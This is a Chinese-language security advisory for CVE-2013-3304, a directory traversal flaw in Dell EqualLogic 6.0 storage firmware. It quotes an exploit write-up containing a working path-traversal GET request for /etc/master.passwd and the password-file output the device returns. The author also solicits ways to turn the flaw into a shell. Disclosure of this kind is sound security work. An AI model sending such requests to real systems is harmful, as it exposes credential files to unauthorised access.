发布日期:2014-10-25
更新日期:2014-10-29
受影响系统:
Dell EqualLogic
描述:
BUGTRAQ ID: 70760
CVE(CAN) ID: CVE-2013-3304
Dell EqualLogicis是基于iSCSI的存储网络系统产品。
Dell EqualLogic 固件版本6.0及其他版本在实现上存在目录遍历漏洞,成功利用后可使攻击者访问任意系统文件。
<*来源:Mauricio Correa
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Mauricio Correa ()提供了如下测试方法:
# Exploit Title: Remote Directory Traversal exploit for Dell EqualLogic 6.0
Storage
# Date: 09/2013
# Exploit Author: Mauricio Pampim Corr�a
# Vendor Homepage:
# Version: 6.0
# Tested on: Equipment Model Dell EqualLogic PS4000
# CVE : CVE-2013-3304
The malicious user sends
GET //../../../../../../../../etc/master.passwd
And the Dell Storage answers
root:[hash] &:/root:/bin/sh
daemon:*:[hash]::0:0:The devil himself:/:/sbin/nologin
operator:*:[hash]::0:0:System &:/usr/guest/operator:/sbin/nologin
bin:*:[hash]::0:0:Binaries Commands and Source:/:/sbin/nologin
sshd:*:[hash]:0:0:SSH pseudo-user:/var/chroot/sshd:/sbin/nologin
uucp:*:[hash]:UNIX-to-UNIX
Copy:/var/spool/uucppublic:/usr/libexec/uucp/uucico
nobody:*:[hash]:Unprivileged user:/nonexistent:/sbin/nologin
grpadmin:[hash]:Group Manager Admin Account:/mgtdb/update:/usr/bin/Cli
authgroup:[hash]:Group Authenication Account:/:/sbin/nologin
More informations in (Br-Portuguese) https://www.xlabs.com.br/blog/?p=50
Could obtain shell with flaw? send me an email telling me how, to
mauricio[at]xlabs.com.br
Thanks
建议:
厂商补丁:
Dell
----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: